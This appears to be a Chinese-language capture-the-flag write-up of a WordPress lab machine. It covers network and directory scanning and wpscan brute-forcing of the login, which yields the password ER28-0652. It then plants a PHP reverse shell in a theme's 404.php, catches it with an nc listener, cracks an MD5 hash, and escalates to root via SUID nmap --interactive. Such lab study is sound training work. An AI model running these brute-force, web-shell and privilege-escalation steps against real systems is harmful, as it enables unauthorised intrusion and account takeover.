資訊收集
還是老樣子
netdiscover掃描
netdiscover -i wlan0 -r 192.168.0.0/24
捕獲到ip192.168.0.103
nmap沒啥東西
就80,443
平常端口
一個22還關了
進入80
花裡胡哨
試了這些指令,就是看動畫,沒用
然後掃描目錄
---- Scanning URL: http://192.168.0.103/ ----
==> DIRECTORY: http://192.168.0.103/0/
==> DIRECTORY: http://192.168.0.103/admin/
+ http://192.168.0.103/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.0.103/audio/
==> DIRECTORY: http://192.168.0.103/blog/
==> DIRECTORY: http://192.168.0.103/css/
+ http://192.168.0.103/dashboard (CODE:302|SIZE:0)
+ http://192.168.0.103/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.103/feed/
==> DIRECTORY: http://192.168.0.103/image/
==> DIRECTORY: http://192.168.0.103/Image/
==> DIRECTORY: http://192.168.0.103/images/
+ http://192.168.0.103/index.html (CODE:200|SIZE:1188)
+ http://192.168.0.103/index.php (CODE:301|SIZE:0)
+ http://192.168.0.103/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.0.103/js/
+ http://192.168.0.103/license (CODE:200|SIZE:19930)
+ http://192.168.0.103/login (CODE:302|SIZE:0)
+ http://192.168.0.103/page1 (CODE:301|SIZE:0)
+ http://192.168.0.103/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.0.103/rdf (CODE:301|SIZE:0)
+ http://192.168.0.103/readme (CODE:200|SIZE:7334)
+ http://192.168.0.103/robots (CODE:200|SIZE:41)
+ http://192.168.0.103/robots.txt (CODE:200|SIZE:41)
+ http://192.168.0.103/rss (CODE:301|SIZE:0)
+ http://192.168.0.103/rss2 (CODE:301|SIZE:0)
+ http://192.168.0.103/sitemap (CODE:200|SIZE:0)
+ http://192.168.0.103/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.103/video/
==> DIRECTORY: http://192.168.0.103/wp-admin/
+ http://192.168.0.103/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.103/wp-content/
+ http://192.168.0.103/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.0.103/wp-includes/
+ http://192.168.0.103/wp-links-opml (CODE:200|SIZE:228)
+ http://192.168.0.103/wp-load (CODE:200|SIZE:0)
+ http://192.168.0.103/wp-login (CODE:200|SIZE:2689)
+ http://192.168.0.103/wp-mail (CODE:403|SIZE:3018)
+ http://192.168.0.103/wp-settings (CODE:500|SIZE:0)
+ http://192.168.0.103/wp-signup (CODE:302|SIZE:0)
+ http://192.168.0.103/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.0.103/xmlrpc.php (CODE:405|SIZE:42)
一個個點的
發現robots.txt、并知道了是wordpress搭建
有兩個檔案
第一個密碼
第二個字典
去重
sort filename | uniq > 1.txt
wpscan(wordpress專屬)
進行掃描使用者
wpscan --url http://192.168.0.103/ -e u
沒找到username
嘗試bp
因為輸入使用者名錯誤,不是那種使用者名或密碼錯誤,嘗試爆破使用者名根據字典
單點爆破使用者名發現賬戶
ELLIOT
elliot
Elliot
wpscan爆破
wpscan --url htto://192.168.0.103 -U elliot -P 字典的路徑 -t 線程數
發現密碼
ER28-0652
入侵
進入登入界面後
發現都是.php
wordpress是php開發的,得找一個php的反彈shell
不用找msf的生成,直接用
/usr/share/laudanum/php/php-reverse-shell.php
然後修改ip端口後
加入到404.php,因為其他頁面找不到,并且這個頁面觸發不要任何管理者權限,隻要出現404就可以提權
然後getshell
nc -nlvp 4444
發現是普通使用者
然後cd /home
發現一個md5檔案、一個3/2的txt檔案
通路txt沒有權限
md5的是
robot:c3fcd3d76192e4007dfb496cca67e13b
然後直接md5解密
切換使用者
su robot
根據suid提權
提權根據suid進行檢視有無可提權的内容
find / -type f perm -u=s 2>/dev/null
發現
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
利用nmap進行提權
/usr/local/bin/nmap --interactive
然後!sh
進入root界面
然後cd /root下看見第三個密碼
完成
後來本着做事做到底的原則
破解
不行,,電腦快炸了,太熱了。。。算力值不夠,1
s才300多,2333333333
參考連結;
linux的suid提權
https://www.anquanke.com/post/id/86979
https://www.hack6.com/212503/blog.html
别人都在不停的努力,自己又怎麼會停